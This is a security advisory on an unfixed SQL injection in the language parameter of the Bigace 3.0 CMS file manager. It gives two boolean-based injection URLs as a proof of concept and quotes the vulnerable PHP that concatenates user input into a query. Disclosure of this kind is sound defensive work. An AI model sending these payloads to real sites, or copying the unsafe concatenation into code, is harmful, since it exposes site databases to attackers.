Bigace 3.0: SQL Injection

Date: 2016-01-28 09:56:34

1. Introduction

2. Overview

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

Bigace is a CMS written in PHP. In version 3.0, the language parameter of the filemanager is open to SQL injection.

A user account is needed to exploit this issue, but it can be in the group "Anonymous", which is the lowest privilege level - it does not have to have any rights associated with it.

3. Proof of Concept

http://localhost//bigace_3.0/public/index.php/filemanager/itemtype/index/?itemtype=4&language=en%27%20and%201=1%20--%20- ->true http://localhost//bigace_3.0/public/index.php/filemanager/itemtype/index/?itemtype=4&language=en%27%20and%201=2%20--%20- -> false

4. Code

/library/Bigace/Item/Walker.php public function assemble() { [...] $languageID = $req->getLanguageID(); [...] if (!is_null($languageID) && $languageID != '') { $extension .= " AND a.language='".$languageID."' "; } else { // if we do not request a special language, we cannot group by id // becuase we would only get back the first (only one!) result "by id" // and not all language version $groupBy = 'a.id, a.language'; } [...] $sql .= " ".$joinExtension." WHERE a.cid={CID} ".$extension." GROUP BY ".$groupBy." ".$order." " . $limit; return $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sql, $values, true); }

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline